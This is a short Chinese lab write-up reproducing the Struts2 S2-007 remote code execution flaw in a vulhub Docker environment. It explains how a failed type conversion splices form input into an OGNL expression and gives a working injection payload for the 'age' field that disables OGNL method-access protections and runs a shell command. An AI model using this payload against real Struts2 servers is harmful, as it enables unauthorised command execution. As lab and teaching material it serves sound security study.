vulhub-struts2-S2-007 远程代码执行漏洞复现

漏洞描述

影响版本: 2.0.0 - 2.2.3

原理

当配置了验证规则 -validation.xml 时，若类型验证转换出错，后端默认会将用户提交的表单值通过字符串拼接，然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction：

(...)
public class UserAction extends ActionSupport {
	private Integer age;
	private String name;
	private String email;

(...)

然后配置有 UserAction-validation.xml：

	
		
			1
			150
		
	

当用户提交 age 为字符串而非整形数值时，后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用，只需要找到一个配置了类似验证规则的表单字段使之转换出错，借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

环境搭建

docker-compose build
docker-compose up -d

 poc：

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

将payload输入到age框，看到回显命令执行成功

 

 失去的东西虽然拿不回来，但是，忘记的事情是可以想起来的